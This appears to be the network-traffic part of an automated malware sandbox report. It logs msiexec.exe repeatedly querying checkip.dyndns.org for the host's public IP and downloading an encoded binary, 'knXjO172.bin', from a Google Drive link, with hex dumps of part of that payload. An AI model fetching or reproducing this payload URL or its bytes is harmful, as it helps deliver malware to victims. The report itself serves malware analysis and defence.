                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:36 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: ffbe6447ec71531f243e71d9afcd7e17
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.449835158.101.44.242808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:38.559715986 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Dec 16, 2024 16:33:39.763645887 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:39 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: a8e913447a7a5e542e79ee0fddea5864
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.449842158.101.44.242808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:41.616498947 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Dec 16, 2024 16:33:42.841303110 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:42 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: 415812684ed01dc7cf04e502814ad29e
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.449853158.101.44.242808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:45.096046925 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Dec 16, 2024 16:33:46.300425053 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:46 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: 09fb8e73e7eda48039e7611cf571b2e3
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.449861158.101.44.242808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:48.409517050 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Dec 16, 2024 16:33:49.648853064 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:49 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: 25ac2d1c58594637463526a056bf4f35
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.449870158.101.44.242808000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Dec 16, 2024 16:33:51.961927891 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Dec 16, 2024 16:33:53.168433905 CET321INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:52 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          X-Request-ID: 409e112eb5d82c3adf725a5efec161e7
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.449778172.217.19.1744438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:18 UTC216OUTGET /uc?export=download&id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                          Host: drive.google.com
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-16 15:33:19 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:18 GMT
                                                                                                                                                                          Location: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Content-Security-Policy: script-src 'nonce-vi4HQAdU2Jh5xRb1Uh1nVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.449784142.250.181.974438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:21 UTC258OUTGET /download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Host: drive.usercontent.google.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:24 UTC4929INHTTP/1.1 200 OK
                                                                                                                                                                          X-GUploader-UploadID: AFiumC7JfEhrf97rK7CpxzqBRHyNj03_ndBFjNF-nQ2Gsu7o_OFzDeXNnVRHGYycsClQXa_1
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Content-Security-Policy: sandbox
                                                                                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Content-Disposition: attachment; filename="knXjO172.bin"
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Length: 277056
                                                                                                                                                                          Last-Modified: Mon, 16 Dec 2024 10:56:37 GMT
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:23 GMT
                                                                                                                                                                          Expires: Mon, 16 Dec 2024 15:33:23 GMT
                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                          X-Goog-Hash: crc32c=1qmqgg==
                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-16 15:33:24 UTC4929INData Raw: cb dc ba c4 de 75 51 4b e3 04 ba 09 78 75 e5 4e 56 ef 38 26 ed 1d b3 da fc 29 fe 35 75 94 7e 54 f7 c3 2b 8e e3 bc be ed 23 69 48 d7 17 47 2b d5 09 3e fe b8 05 4e 60 d1 a1 0d a7 8f 2f a2 4a 0b 72 d6 ff b5 eb 94 0e 19 4b 5c d7 72 36 2e de ee f5 2b a3 e0 aa 1d 4d b3 04 f2 ac db 2a fa ee ec 4b 83 76 e8 a3 7c 8c e2 b1 4c b5 40 59 ab 39 ae 84 9c fa 20 f0 61 d7 ef da 49 43 d8 f7 21 a1 46 fc 1e ff f5 5c 4f 4f 10 39 37 41 6c d8 e2 7e 2d c5 d0 64 93 75 b6 5d 91 b9 8b 59 fd b9 70 03 84 01 e6 80 9e 91 85 31 7f 75 87 e1 9c 1e e8 65 3a cc 29 07 c2 ff 14 c4 34 2d 28 9e a2 b6 d2 36 91 15 ab 7b 7e 84 3f d0 40 59 dc bd 78 b9 92 35 ad d4 c9 fa 01 e5 dd bc 0c 0d f4 94 f9 fb 1a 04 63 7c a1 e1 bb 92 9e fd ce 1c 35 54 7f 26 af c2 f1 4e 1f 2d cb 5f 09 96 b0 20 9b 45 86 05 f4 c3
                                                                                                                                                                          Data Ascii: uQKxuNV8&)5u~T+#iHG+>N`/JrK\r6.+M*Kv|L@Y9 aIC!F\OO97Al~-du]Yp1ue:)4-(6{~?@Yx5c|5T&N-_ E
                                                                                                                                                                          2024-12-16 15:33:24 UTC4840INData Raw: f8 69 a7 f8 fe 8c 21 25 7e f1 fc 1d 36 5b 11 51 c1 40 27 5f 55 6a 4a 76 e3 2f d2 3b ec 6e 6d 3c 89 c7 8a 9d 03 67 e1 05 04 17 7c d3 71 50 41 3b 1d d8 2e d9 e3 30 d6 a8 7c 27 55 76 a2 61 90 68 95 83 64 07 08 b9 a0 11 87 f0 2d 4b c7 f5 4f d8 69 a4 84 17 6e a0 28 4a b9 ef 01 e2 cb 6a ac 99 9c e4 2d 8e a8 38 42 39 e6 24 f0 1b 53 1c 34 7d ec f0 03 24 0e ff cb 2e 77 ff c4 85 31 f2 2c 39 61 c7 35 7e 50 55 cb 68 4d 9d ef 00 37 75 5f 60 a5 d2 fb 66 33 79 df 15 0e 23 00 74 95 34 73 7c 21 6c e9 b9 de 6d 16 36 46 3a 17 44 fd b4 c5 12 6b 9a 63 df bd 72 49 6e 7b 79 1b d2 67 87 86 02 aa 39 27 50 cc 19 c7 95 5c 4e c0 cb cb 84 dd b3 de 53 67 1c d4 9e 55 0d 17 73 fc ad bf ab df 48 02 49 59 50 20 5e d5 d3 05 9a 00 5f 84 f1 51 d6 4d 87 40 4e 83 8c 2f 0a 8f a6 34 41 2c 56 c4
                                                                                                                                                                          Data Ascii: i!%~6[Q@'_UjJv/;nm<g|qPA;.0|'Uvahd-KOin(Jj-8B9$S4}$.w1,9a5~PUhM7u_`f3y#t4s|!lm6F:DkcrIn{yg9'P\NSgUsHIYP ^_QM@N/4A,V
                                                                                                                                                                          2024-12-16 15:33:24 UTC1322INData Raw: 9f 2a 93 3b 26 1d ed 6f 45 b5 86 27 bd 04 cb 93 87 9f 40 89 11 4c 66 2e f2 32 d4 95 a2 26 a6 15 89 54 dd 63 ea b7 4a d6 df ec fa 39 29 2f c4 c7 41 7a 3a 4e 59 af b8 5a a8 96 00 3f 5d b1 58 79 12 7b 80 f1 19 c1 7c e9 29 eb c6 a2 04 13 4a bc f8 de 4a 6a c8 08 79 cc e6 c5 e3 8d 60 48 33 60 fe 59 af 94 d6 47 6a 62 08 51 30 d7 50 d1 62 50 28 70 ff e0 53 63 d8 02 ca d6 da 29 89 91 6e 8c 39 85 4c 53 ec 6a de bd 6d ea 63 ad 57 8b 91 e1 09 e6 1d 1f be fa 8a 7e ef 40 63 e6 07 83 ad 4e cb c0 2f 04 4a fb 38 18 f7 ff af a3 04 91 8e 40 d6 04 c0 6a e1 65 ac 2d 2b 4e ab 6a 21 23 95 95 c7 04 8a 72 b2 3c f8 e7 08 c9 1f 27 83 c0 88 f3 67 3b fe d3 1d 9e fd 90 c3 c9 3a 48 11 51 bb fb 63 93 e4 a5 b8 e2 b1 48 3e 7f d0 f4 b4 ed 4e 34 e7 88 bd de 8c 41 09 55 5d fd 55 25 32 e1 ac
                                                                                                                                                                          Data Ascii: *;&oE'@Lf.2&TcJ9)/Az:NYZ?]Xy{|)JJjy`H3`YGjbQ0PbP(pSc)n9LSjmcW~@cN/J8@je-+Nj!#r<'g;:HQcH>N4AU]U%2
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 6d a7 b6 a1 41 57 ab d7 59 7b 16 66 70 f7 53 fb ba 2d 1d d2 d2 51 0f f4 ad 70 cc 50 6f fb 35 74 f8 f2 39 75 46 ee 75 17 4a 77 d0 d3 af f1 43 59 84 8b 12 75 00 42 5a 17 b9 61 b3 e9 f2 0a 0a d0 a3 ee 21 2f 1b 73 fc 1d 16 48 30 0b 00 00 27 5d 54 4f 5c 5e 10 3d d2 7c 4f 4b 7a 85 3c c7 8a 99 a1 42 f9 77 63 18 7c a1 d3 75 58 e8 24 d8 2e c6 41 15 cc 12 4c 24 55 08 00 49 e5 68 95 89 77 25 1e 91 d6 10 87 fa 2d bc c6 f9 4f 00 40 d3 84 07 64 a0 28 71 86 ef 00 fd ea 48 de 09 8f e4 5d e3 b7 38 53 3d ce 45 93 1b 59 07 1d 04 84 aa 03 20 2c c2 a4 72 71 ff 10 fa 70 da 18 33 61 ca 39 4d dd 22 a9 68 4c f8 54 00 37 7f 5f 19 95 bd 9d 62 41 e6 da 7a 19 35 28 ff fa 5c 79 6a d5 61 fa ee a6 49 3a 60 48 b3 57 55 f9 bd f7 77 73 d7 6c d5 de d5 6c 68 56 be 70 d2 6d 2f b0 1c c9 58 2a
                                                                                                                                                                          Data Ascii: mAWY{fpS-QpPo5t9uFuJwCYuBZa!/sH0']TO\^=|OKz<Bwc|uX$.AL$UIhw%-O@d(qH]8S=EY ,rqp3a9M"hLT7_bAz5(\yjaI:`HWUwsllhVpm/X*
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 0a 4d 17 21 67 87 69 7a f8 ef 2a f2 41 69 fa e8 f1 25 02 6d 85 db 45 b7 71 1d 88 3f 88 1c 58 e8 94 04 0a 48 4d d1 1d 18 d1 de e4 5c 2c cc 33 aa 1d 47 b3 3a ce ac db 2e 89 27 ec 4b 89 65 e0 dd 4d 8c e2 b5 3e 20 42 59 db 2f 86 05 9c fa 2a e6 9f d6 fc d3 58 4a f4 7b 30 a9 51 9d cb 45 fb 56 fb 46 f6 13 8f 51 28 03 ac e0 45 ac a9 44 e3 16 d1 44 dd d8 e6 7d b6 13 1e 6d e1 1a 0a e2 fb bb f7 55 19 2b d4 8f bc 5e d9 0d 1a a1 42 10 1b d1 19 c3 51 c4 28 9e a8 b6 c3 3e 80 43 81 b5 7e c8 34 d3 51 86 36 e2 1e b9 98 35 85 b0 c9 fa 07 05 03 ae 28 2e c1 c4 f9 f1 2d 0a 63 54 d7 e1 bb 98 40 fd ce 42 76 2e 4a 26 8f c6 83 db 7d 29 bb 49 21 57 b0 20 b1 53 78 04 e5 c8 1d b2 5f a5 ff a7 82 bc 6e f6 d6 ad 4c fd d6 a3 48 6c 15 27 01 eb f5 bc 97 bd fa db 0b de d2 32 ca 98 7f 3b ca
                                                                                                                                                                          Data Ascii: M!giz*Ai%mEq?XHM\,3G:.'KeM> BY/*XJ{0QEVFQ(EDD}mU+^BQ(>C~4Q65(.-cT@Bv.J&})I!W Sx_nLHl'2;
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 6b e5 31 09 8e 9f 40 ca 76 a9 45 f8 2e e3 f5 6e 26 ac 9d 09 23 72 82 f5 6a 97 a7 03 73 0d a3 fb b7 ad e3 53 fe 91 c7 41 4a 7c e0 f3 95 d2 9f 20 8a 28 d8 34 84 68 7c 9b 5a 79 bb 10 1b c6 87 9f 3f 93 3c 4c 62 56 15 1b c4 e5 c4 19 aa 16 89 5e ca b8 fd da 08 c7 d9 d1 11 3f 29 2f bc 87 f8 7a 3e 36 58 98 ad 2a ce 96 da 3f 5d b1 30 cc 13 68 83 c8 54 f8 4c e2 57 f4 c6 b6 fe 3d 3d bc f8 d2 9b be dc 1c 5b 5e 27 c5 e9 f3 e3 3b f1 61 f2 53 b4 ee ae 5f 14 28 67 ea 34 a4 99 d1 6a 24 05 b4 ff e4 27 20 c9 0a a1 60 66 29 83 e5 3c 31 39 81 29 95 c4 30 d4 bd 76 ff 9c 74 47 8b e0 ec ab 94 06 00 cc 25 38 5b 88 40 8c e6 07 83 60 ac d3 b2 42 0b 5b 83 87 b0 ae 81 97 a2 21 83 5e 28 c3 76 3b c7 c4 02 26 bc 30 30 bd c8 04 3f 88 1c c8 04 f0 72 b2 39 f4 98 1c c9 6b 27 8e af fa 78 62
                                                                                                                                                                          Data Ascii: k1@vE.n&#rjsSAJ| (4h|Zy?<LbV^?)/z>6X*?]0hTLW==[^';aS_(g4j$' `f)<19)0vtG%8[@`B[!^(v;&00?r9k'xb
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: d6 d1 b5 08 b8 42 7e 97 f8 fa e1 8c 0b 75 57 f0 b8 98 50 05 51 dc be 9a 8e a7 9f f5 32 75 00 7e 3b 32 a5 13 2a e6 e4 52 de f8 d6 e4 21 05 74 23 fc 1d 34 2c 11 10 87 40 3b d0 15 6a 4a 2d c6 39 a0 aa e6 6e 1d 85 c9 c7 8a 95 a1 42 f6 7b 41 17 7c d5 d3 75 59 e4 f7 c9 2e b2 cb 70 d6 60 7b 85 70 61 dc 27 90 68 91 21 41 1d 7a ae b2 10 f7 52 08 87 dd 78 0f 00 68 a5 a1 11 1c 39 38 0f c9 4d 25 ee d3 dd ac 28 96 46 08 85 da a9 46 39 96 ae b6 02 7b a2 3f 7a ce 08 26 3e 76 8f b6 72 07 5d e6 9f 55 f2 26 91 49 b5 2a 6e d7 19 d5 1a 95 e7 8a 70 49 60 5f 67 a6 95 d4 66 33 79 aa bd 7b 23 70 56 b8 5c 73 7a 3a 7e f8 de 9f 29 16 3c 53 3e ca d4 f8 bc d2 44 29 ae 63 d5 a4 64 56 7f 56 68 70 d2 6d 53 95 04 bb 3f 25 41 94 19 c7 9b 2e 05 cc cb aa 94 d9 3a cf 55 02 0b 2a 9f 4c 2d da
                                                                                                                                                                          Data Ascii: B~uWPQ2u~;2*R!t#4,@;jJ-9nB{A|uY.p`{pa'h!AzRxh98M%(FF9{?z&>vr]U&I*npI`_gf3y{#pV\sz:~)<S>D)cdVVhpmS?%A.:U*L-
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 4f bd 0f e8 84 3f 85 43 b2 e1 fb 0f 19 4f 56 d7 ae 17 c2 fb c6 79 2b a3 ea b9 19 4d 9b 26 f2 ac d1 f7 99 e8 ec 4b 83 76 e8 dd 4e 8c e2 b5 3e 20 42 59 db 2f 86 05 9c fa 2a e6 9f d6 fc df 58 46 e1 bd 23 a1 46 8c 2e 45 fb 58 89 35 cd 18 ff 56 08 94 c3 2a 4f ba 5d 45 f0 01 c8 3c da e8 e7 79 9e d8 0a 93 ed 48 c6 e2 fd c2 37 44 11 5f c6 4e bc 5a ad 36 69 63 46 63 ad c2 1e d8 39 77 12 9e a2 b2 a1 f5 91 45 e4 14 ba c8 3e d9 40 91 5e 42 db b9 92 3f d3 e9 c9 fa 05 6a 1b be 0d 0c f5 d5 fe 89 a7 10 63 0c 9d 55 bb 92 94 8f 61 52 76 20 57 7d 8f c2 fb 21 b8 29 cb 55 09 c7 b7 3d 36 05 86 05 f7 e6 1a cb 5d 78 fe d7 20 e7 52 de 62 a9 64 1c 74 86 5a 0d 7e 56 37 9b 57 9d fc f2 d3 db 7b cc 58 96 d0 ea 44 2e 34 3b 3b 0a 6b be 10 68 46 81 8b cb d9 87 c7 67 47 35 13 a4 40 18 56
                                                                                                                                                                          Data Ascii: O?COVy+M&KvN> BY/*XF#F.EX5V*O]E<yH7D_NZ6icFc9wE>@^B?jcUaRv W}!)U=6]x RbdtZ~V7W{XD.4;;khFgG5@V
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 2a c6 8e e6 9c 06 4a df 06 de ac ad f0 53 fe 91 17 f1 54 0e d7 f3 bd 23 3d 08 f5 3e 26 3f e0 33 45 bf 51 6a 99 1f 46 d3 87 9f 3f 9e 07 3e 3b 4b 67 40 76 c0 a3 26 93 15 89 54 69 b8 f3 d6 2b c8 d9 a5 9b 1e 30 51 82 e8 41 7e 9c 19 30 cd 89 29 be ce 23 17 28 bb 4e 8d 00 4b 91 c8 68 f8 4c e2 29 cb c6 ba fa 15 5f cb f8 d8 33 aa c8 76 4c e4 27 c1 f2 a5 12 42 e6 60 8e 2d a3 9c c7 4b 3c 11 08 51 3e b5 b0 af 22 5a 47 b0 d7 de 59 63 cf 0a 7b 03 ff 01 b7 ef 53 86 2a a5 23 bd 8e 6a d4 b7 a2 e2 11 34 47 f5 d6 c9 bd e2 6f 80 ce 55 ea 68 b7 e9 38 e6 0d 9f 3c 88 d8 e5 34 21 77 af 38 18 f7 ff af a3 04 91 8e 36 cf 04 c0 6a e1 65 ac 2d 2b 4e ab 6a 21 23 95 95 c7 04 8a 72 b2 3c f8 e7 08 c9 1f 27 83 c0 88 49 6b 3b fe d3 1d 9e fd 9a c3 c9 3a 48 11 51 bb 25 7a 93 e4 a5 b8 e2 b1
                                                                                                                                                                          Data Ascii: *JST#=>&?3EQjF?>;Kg@v&Ti+0QA~0)#(NKhL)_3vL'B`-K<Q>"ZGYc{S*#j4GoUh8<4!w86je-+Nj!#r<'Ik;:HQ%z
